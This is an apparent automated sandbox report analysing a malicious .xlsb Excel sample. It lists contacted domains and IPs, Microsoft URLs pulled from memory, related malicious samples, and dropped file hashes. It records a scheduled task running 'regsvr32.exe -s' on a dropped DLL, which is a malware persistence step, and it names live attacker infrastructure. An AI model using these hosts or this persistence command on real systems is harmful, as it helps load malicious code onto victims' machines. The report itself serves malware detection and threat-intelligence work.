https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
https://ncus.contentsync.	0%	URL Reputation	safe
https://ncus.contentsync.	0%	URL Reputation	safe
https://ncus.contentsync.	0%	URL Reputation	safe
https://ncus.contentsync.	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://wus2.contentsync.	0%	URL Reputation	safe
https://wus2.contentsync.	0%	URL Reputation	safe
https://wus2.contentsync.	0%	URL Reputation	safe
https://wus2.contentsync.	0%	URL Reputation	safe
https://asgsmsproxyapi.azurewebsites.net/	0%	Avira URL Cloud	safe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	0%	URL Reputation	safe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	0%	URL Reputation	safe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	0%	URL Reputation	safe
https://ncus.pagecontentsync.	0%	URL Reputation	safe
https://ncus.pagecontentsync.	0%	URL Reputation	safe
https://ncus.pagecontentsync.	0%	URL Reputation	safe
https://skyapi.live.net/Activity/	0%	URL Reputation	safe
https://skyapi.live.net/Activity/	0%	URL Reputation	safe
https://skyapi.live.net/Activity/	0%	URL Reputation	safe
https://dataservice.o365filtering.com	0%	URL Reputation	safe
https://dataservice.o365filtering.com	0%	URL Reputation	safe
https://dataservice.o365filtering.com	0%	URL Reputation	safe
https://api.cortana.ai	0%	URL Reputation	safe
https://api.cortana.ai	0%	URL Reputation	safe
https://api.cortana.ai	0%	URL Reputation	safe
https://ovisualuiapp.azurewebsites.net/pbiagave/	0%	Avira URL Cloud	safe
https://directory.services.	0%	URL Reputation	safe
https://directory.services.	0%	URL Reputation	safe
https://directory.services.	0%	URL Reputation	safe
https://staging.cortana.ai	0%	URL Reputation	safe
https://staging.cortana.ai	0%	URL Reputation	safe
https://staging.cortana.ai	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
treasurechestcaribbean.com	192.185.33.154	true	false	0%, Virustotal, Browse	unknown
shadiinfo.com	43.225.55.182	true	false	0%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.diagnosticssdf.office.com	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://login.microsoftonline.com/	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://shell.suite.office.com:1443	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://autodiscover-s.outlook.com/	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://cdn.entity.	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.addins.omex.office.net/appinfo/query	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://clients.config.office.net/user/v1.0/tenantassociationkey	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://powerlift.acompli.net	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://rpsticket.partnerservices.getmicrosoftkey.com	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://lookup.onenote.com/lookup/geolocation/v1	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://cortana.ai	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://cloudfiles.onenote.com/upload.aspx	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://entitlement.diagnosticssdf.office.com	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://api.aadrm.com/	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://ofcrecsvcapi-int.azurewebsites.net/	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://api.microsoftstream.com/api/	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://cr.office.com	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://portal.office.com/account/?ref=ClientMeControl	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://graph.ppe.windows.net	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://res.getmicrosoftkey.com/api/redemptionevents	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://powerlift-frontdesk.acompli.net	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://tasks.office.com	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://officeci.azurewebsites.net/api/	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://sr.outlook.office.net/ws/speech/recognize/assistant/work	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://store.office.cn/addinstemplate	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://outlook.office.com/autosuggest/api/v1/init?cvid=	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://globaldisco.crm.dynamics.com	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://store.officeppe.com/addinstemplate	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://dev0-api.acompli.net/autodetect	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.odwebp.svc.ms	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.powerbi.com/v1.0/myorg/groups	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://web.microsoftstream.com/video/	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://graph.windows.net	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://dataservice.o365filtering.com/	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://officesetup.getmicrosoftkey.com	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://analysis.windows.net/powerbi/api	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://prod-global-autodetect.acompli.net/autodetect	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://outlook.office365.com/autodiscover/autodiscover.json	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://ncus.contentsync.	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
http://weather.service.msn.com/data.aspx	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://apis.live.net/v5.0/	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://management.azure.com	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://wus2.contentsync.	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://incidents.diagnostics.office.com	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://clients.config.office.net/user/v1.0/ios	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://insertmedia.bing.office.net/odc/insertmedia	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://o365auditrealtimeingestion.manage.office.com	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://outlook.office365.com/api/v1.0/me/Activities	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://api.office.net	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://incidents.diagnosticssdf.office.com	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://asgsmsproxyapi.azurewebsites.net/	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false	Avira URL Cloud: safe	unknown
https://clients.config.office.net/user/v1.0/android/policies	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://entitlement.diagnostics.office.com	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://outlook.office.com/	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://storage.live.com/clientlogs/uploadlocation	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://templatelogging.office.com/client/log	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://outlook.office365.com/	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://webshell.suite.office.com	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://management.azure.com/	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://login.windows.net/common/oauth2/authorize	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://graph.windows.net/	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://api.powerbi.com/beta/myorg/imports	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://devnull.onenote.com	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://ncus.pagecontentsync.	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://messaging.office.com/	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://augloop.office.com/v2	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://skyapi.live.net/Activity/	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://clients.config.office.net/user/v1.0/mac	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://dataservice.o365filtering.com	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.cortana.ai	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://onedrive.live.com	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://ovisualuiapp.azurewebsites.net/pbiagave/	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false	Avira URL Cloud: safe	unknown
https://visio.uservoice.com/forums/368202-visio-on-devices	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://directory.services.	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://login.windows-ppe.net/common/oauth2/authorize	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high
https://staging.cortana.ai	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://loki.delve.office.com/api/v1/configuration/officewin32/	2931D31E-E476-4A7B-8B64-97D46D540C47.0.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
43.225.55.182	shadiinfo.com	United Arab Emirates		394695	PUBLIC-DOMAIN-REGISTRYUS	false
192.185.33.154	treasurechestcaribbean.com	United States		46606	UNIFIEDLAYER-AS-1US	false

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	433122
Start date:	11.06.2021
Start time:	11:01:06
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 15s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	audit-1133808478.xlsb
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	38
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLSB@20/20@2/2
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 80.1% (good quality ratio 75.7%) Quality average: 82.4% Quality standard deviation: 27.5%
HCA Information:	Successful, ratio: 99% Number of executed functions: 63 Number of non-executed functions: 63
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsb Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, wermgr.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 104.43.193.48, 13.64.90.137, 52.109.76.68, 52.109.76.33, 23.218.208.56, 20.50.102.62, 2.20.142.210, 2.20.142.209, 20.54.26.129, 20.82.210.154, 92.122.213.247, 92.122.213.194, 40.126.31.135, 40.126.31.143, 20.190.159.132, 40.126.31.139, 20.190.159.138, 20.190.159.134, 40.126.31.4, 40.126.31.141, 104.42.151.234 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, prod-w.nexus.live.com.akadns.net, www.tm.lg.prod.aadmsa.akadns.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, login.live.com, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, www.tm.a.prd.aadg.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, login.msa.msidentity.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, europe.configsvc1.live.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information.

Simulations

Behavior and APIs

Time	Type	Description
11:02:03	API Interceptor	1170x Sleep call for process: splwow64.exe modified
11:02:19	Task Scheduler	Run new task: hoqmcni path: regsvr32.exe s>-s "C:\Users\user\covi1.dll"

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
43.225.55.182	#Ubb38#Uc7ac#Uc778 #Ub300#Ud1b5#Ub839 #Uc2e0#Uc0c1#Uc815#Ubcf4.pdf.exe.exe	Get hash	malicious	Browse	www.mytargethub.com/s0h/

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
UNIFIEDLAYER-AS-1US	my_attach_82862.xlsb	Get hash	malicious	Browse	50.87.220.158
	Fax_Doc#01_5.html	Get hash	malicious	Browse	162.241.7.171
	WcCEh3daIE.xls	Get hash	malicious	Browse	162.241.77.193
	KCTC International Ltd.exe	Get hash	malicious	Browse	192.254.185.244
	lTAPQJikGw.exe	Get hash	malicious	Browse	74.220.199.8
	supply us this product.exe	Get hash	malicious	Browse	50.87.146.199
	#U260e#Ufe0f Zeppelin.com AudioMessage_259-55.HTM	Get hash	malicious	Browse	192.185.74.169
	3arZKnr21W.exe	Get hash	malicious	Browse	192.254.235.195
	6b6zVfqxbk.xlsb	Get hash	malicious	Browse	216.172.184.23
	HM-20210428 HBL.exe	Get hash	malicious	Browse	192.254.180.165
	INQUIRY. ZIP.exe	Get hash	malicious	Browse	50.87.190.227
	audit-78958169.xlsb	Get hash	malicious	Browse	192.185.113.120
	research-1315978726.xlsb	Get hash	malicious	Browse	216.172.184.23
	ExHNIXd73f.exe	Get hash	malicious	Browse	108.167.142.232
	research-2012220787.xlsb	Get hash	malicious	Browse	216.172.184.23
	research-2012220787.xlsb	Get hash	malicious	Browse	216.172.184.23
	viVrtGR9Wg.xlsb	Get hash	malicious	Browse	192.185.113.120
	DEMLwnv0Nt.xlsb	Get hash	malicious	Browse	192.185.113.120
	audit-367497006.xlsb	Get hash	malicious	Browse	192.185.113.120
	analysis-31947858.xlsb	Get hash	malicious	Browse	108.167.156.223
PUBLIC-DOMAIN-REGISTRYUS	Factura PO 1541973.exe	Get hash	malicious	Browse	208.91.199.223
	Urgent Contract Order GH7856648,pdf.exe	Get hash	malicious	Browse	208.91.198.143
	NEW ORDER 112888#.exe	Get hash	malicious	Browse	208.91.199.224
	oRSxZhDFLi.exe	Get hash	malicious	Browse	208.91.199.225
	SAUDI ARAMCO Tender Documents - BOQ and ITB.exe	Get hash	malicious	Browse	208.91.199.223
	0PyeqVfoHGFVl2r.exe	Get hash	malicious	Browse	208.91.199.223
	#U260e#Ufe0f Zeppelin.com AudioMessage_259-55.HTM	Get hash	malicious	Browse	207.174.212.247
	SecuriteInfo.com.MachineLearning.Anomalous.97.15449.exe	Get hash	malicious	Browse	208.91.198.143
	lFccIK78FD.exe	Get hash	malicious	Browse	208.91.198.143
	Order10 06 2021.doc	Get hash	malicious	Browse	162.215.241.145
	PO187439.exe	Get hash	malicious	Browse	119.18.54.126
	Urgent Contract Order GH78566484,pdf.exe	Get hash	malicious	Browse	208.91.199.223
	MOQ FOB ORDER.exe	Get hash	malicious	Browse	208.91.199.225
	JK6Ul6IKioPWJ6Y.exe	Get hash	malicious	Browse	208.91.198.143
	ekrrUChjXvng9Vr.exe	Get hash	malicious	Browse	208.91.199.223
	SecuriteInfo.com.Trojan.PackedNET.832.15445.exe	Get hash	malicious	Browse	208.91.198.143
	order 4806125050.xlsx	Get hash	malicious	Browse	208.91.199.223
	Bank Swift.doc	Get hash	malicious	Browse	162.215.241.145
	SecuriteInfo.com.Trojan.PackedNET.831.28325.exe	Get hash	malicious	Browse	208.91.199.225
	Trial order 20210609.exe	Get hash	malicious	Browse	208.91.199.224

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	tXkin8g4sy.exe	Get hash	malicious	Browse	43.225.55.182 192.185.33.154
	xGrfj8RvYg.exe	Get hash	malicious	Browse	43.225.55.182 192.185.33.154
	my_attach_82862.xlsb	Get hash	malicious	Browse	43.225.55.182 192.185.33.154
	document-47-2637.xls	Get hash	malicious	Browse	43.225.55.182 192.185.33.154
	logo.png.exe	Get hash	malicious	Browse	43.225.55.182 192.185.33.154
	document-47-2637.xls	Get hash	malicious	Browse	43.225.55.182 192.185.33.154
	Fax_Doc#01_5.html	Get hash	malicious	Browse	43.225.55.182 192.185.33.154
	wa71myDkbQ.exe	Get hash	malicious	Browse	43.225.55.182 192.185.33.154
	Current-Status-062021-81197.xlsb	Get hash	malicious	Browse	43.225.55.182 192.185.33.154
	logo.png.exe	Get hash	malicious	Browse	43.225.55.182 192.185.33.154
	3F97s4aQjB.xlsx	Get hash	malicious	Browse	43.225.55.182 192.185.33.154
	WcCEh3daIE.xls	Get hash	malicious	Browse	43.225.55.182 192.185.33.154
	ATT00005.htm	Get hash	malicious	Browse	43.225.55.182 192.185.33.154
	kxjeAvsg1v.exe	Get hash	malicious	Browse	43.225.55.182 192.185.33.154
	VSA75RUmYZ.exe	Get hash	malicious	Browse	43.225.55.182 192.185.33.154
	iX22xMeXIc.exe	Get hash	malicious	Browse	43.225.55.182 192.185.33.154
	QWkt5w3cO2.exe	Get hash	malicious	Browse	43.225.55.182 192.185.33.154
	#U260e#Ufe0f Zeppelin.com AudioMessage_259-55.HTM	Get hash	malicious	Browse	43.225.55.182 192.185.33.154
	vTtOheCXBQ.exe	Get hash	malicious	Browse	43.225.55.182 192.185.33.154
	6b6zVfqxbk.xlsb	Get hash	malicious	Browse	43.225.55.182 192.185.33.154

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_regsvr32.exe_966f6bdcff9737fc802b47af467457fc41233c5_7a325c51_107bbe97\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	11462
Entropy (8bit):	3.77308262242532
Encrypted:	false
SSDEEP:	192:wUq/zcQb6V+LH/RS5uGXx3RjetM/u7scS274ItUY:w/bca6VC/RS5n3jeO/u7scX4ItUY
MD5:	CE37771697278B981D20999A95BFDF29
SHA1:	00EF65F4D83D90E7739C7A599EF9BE2A3F44C814
SHA-256:	9E949262E348E4642E2DEC6EA6EA8B818B85DAA990FB833EA2D859DAE6628818
SHA-512:	56433A27593C14CB5A134FC0DED1EDBA496A5AD8383E0765061342F7890CEFA749C83FD07DD7A7DF46D2E5F2A0D20DAB7C709F99DE81D8E93A631B3FC67B2949
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.7.9.0.8.1.4.6.1.8.6.9.4.7.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.5.f.0.a.2.e.f.-.9.a.d.1.-.4.7.4.8.-.b.f.e.2.-.9.c.1.3.3.3.9.2.c.2.4.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.9.c.5.0.e.e.6.-.c.f.c.0.-.4.7.0.1.-.9.f.5.7.-.f.b.e.2.d.d.e.a.f.6.0.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.e.g.s.v.r.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.E.G.S.V.R.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.2.0.-.0.0.0.0.-.0.0.1.7.-.8.d.1.2.-.b.a.e.c.e.b.5.e.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.8.6.3.0.f.6.0.e.7.3.4.5.4.6.7.0.a.7.d.9.b.6.4.c.9.8.b.4.7.9.8.d.1.d.e.8.8.7.2.!.r.e.g.s.v.r.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.7.1././.0.4././.0.9.:.1.7.:.2.8.:.2.3.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_regsvr32.exe_966f6bdcff9737fc802b47af467457fc41233c5_7a325c51_16353894\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	11464
Entropy (8bit):	3.774404084036514
Encrypted:	false
SSDEEP:	192:ZDzcXb6VeLH/RS5uGXx3RjetM/u7shS274ItUZ:hcL6Vi/RS5n3jeO/u7shX4ItUZ
MD5:	E9F4D44015D9C4E9E3FB16EA0B339B19
SHA1:	2EC6BF906FDBB451D78599AFC59C737904D328DC
SHA-256:	E7A1D97923F74F0BDEA6F7D60CC76744D76EF91992D17540288EFB2B299E9BC9
SHA-512:	1A8357E418716B05CB3CEC9DE8EA413A303B8A582B872FFD7711FFD04FAF790B7FFA938D00857F24A912D4E083EFF6934A6DE29871B2827BF52960175352594D
Malicious:	false
